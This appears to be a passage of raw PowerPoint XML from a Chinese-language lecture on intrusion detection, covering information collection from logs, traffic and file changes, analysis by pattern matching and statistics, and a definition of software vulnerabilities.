              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>信息收集</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>信息分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）结果处理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>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F40D2BF7-903B-40B6-B94F-56F62BDC4AA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="762000"/>
            <a:ext cx="7793038" cy="912813"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信息收集</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105475" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D198011A-B007-45DF-B212-79C9FF544742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2133600"/>
            <a:ext cx="8077200" cy="3810000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>入侵检测的第一步是信息收集，收集内容包括系统、网络、数据及用户活动的状态和行为。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>需要在计算机网络系统中的若干不同关键点（不同网段和不同主机）收集信息，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>尽可能扩大检测范围</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>从一个源来的信息有可能看不出疑点</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0062AB34-37BB-46FD-A59B-8717C2C26388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="838200"/>
            <a:ext cx="7793038" cy="912813"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信息收集</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106499" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D447B838-3EC5-4711-97DA-90A37890485F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2286000"/>
            <a:ext cx="8077200" cy="2667000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>入侵检测很大程度上依赖于收集信息的可靠性和正确性，因此，要保证用来检测网络系统的软件的完整性，特别是入侵检测系统软件本身应具有相当强的坚固性，防止被篡改而收集到错误的信息 </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E7C9355B-DE75-43DD-9E42-2B6F3A0E77B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信息收集的来源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107523" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD83936D-FE06-4037-A9F1-C730A4D0310E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2209800"/>
            <a:ext cx="7772400" cy="2895600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>系统或网络的日志文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>网络流量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>系统目录和文件的异常变化</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>程序执行中的异常行为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>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F0E5C38D-3A86-4C82-921D-826D76075C2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统或网络的日志文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108547" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCC2EF13-4E93-425B-9C3A-E2E6361650BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2133600"/>
            <a:ext cx="7772400" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>黑客经常在系统日志文件中留下他们的踪迹，因此，充分利用系统和网络日志文件信息是检测入侵的必要条件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>日志文件中记录了各种行为类型，每种类型又包含不同的信息，例如记录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>用户活动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>类型的日志，就包含登录、用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>改变、用户对文件的访问、授权和认证信息等内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>显然，对用户活动来讲，不正常的或不期望的行为就是重复登录失败、登录到不期望的位置以及非授权的企图访问重要文件等等 </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6987E404-E251-4C96-8589-3CC3ECAA01B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统目录和文件的异常变化</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109571" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{745D9F9A-9232-4FF1-B59A-BB94ACD46328}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2133600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>网络环境中的文件系统包含很多软件和数据文件，包含重要信息的文件和私有数据文件经常是黑客修改或破坏的目标。目录和文件中的不期望的改变（包括修改、创建和删除），特别是那些正常情况下限制访问的，很可能就是一种入侵产生的指示和信号</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>入侵者经常替换、修改和破坏他们获得访问权的系统上的文件，同时为了隐藏系统中他们的表现及活动痕迹，都会尽力去替换系统程序或修改系统日志文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t> </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741A6D50-47B1-465D-B4C6-0DF21ED406A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信息分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110595" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B30E7756-5AF9-4AB8-B9CB-C7C81EFE139E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2438400"/>
            <a:ext cx="7772400" cy="1828800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="0000FF"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>模式匹配</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="0000FF"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t> 统计分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="0000FF"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t> 完整性分析，往往用于事后分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="000066"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>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CADB734B-3BCD-4A6C-9BFB-42C2B01C31F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2、漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79FE68B8-63FD-4792-B2B7-6FCFF9CCEAE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1752600"/>
            <a:ext cx="7989887" cy="4114800"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>  入侵主要利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>漏洞是指系统硬件、操作系统、软件、网络协议等在设计上、实现上出现的可以被攻击者利用的错误、缺陷和疏漏。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3721D7E0-CEE8-4869-811B-CFD7DC9C1FCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="5517232"/>
            <a:ext cx="6696744" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>时刻牢记：人可能就是最大的漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0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29941352-75CE-4911-B1E6-F267FE12F797}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>模式匹配</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111619" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{579BDA95-8AA1-4F05-A71A-B96476E9E404}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="2133600"/>
            <a:ext cx="8077200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>模式匹配就是将收集到的信息与已知的网络入侵和系统误用模式数据库进行比较，从而发现违背安全策略的行为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>一般来讲，一种进攻模式可以用一个过程（如执行一条指令）或一个输出（如获得权限）来表示。该过程可以很简单（如通过字符串匹配以寻找一个简单的条目或指令），也可以很复杂（如利用正规的数学表达式来表示安全状态的变化）</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45E83047-E0BE-4410-9FAF-595F1A086DA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>统计分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112643" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{374ABE9D-37DA-4E72-89BA-F481FE473C00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2209800"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>统计分析方法首先给系统对象（如用户、文件、目录和设备等）创建一个统计描述，统计正常使用时的一些测量属性（如访问次数、操作失败次数和延时等）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>测量属性的平均值将被用来与网络、系统的行为进行比较，任何观察值在正常值范围之外时，就认为有入侵发生</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BB3ECFF3-9FE5-49E7-8152-FB52B5F25726}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
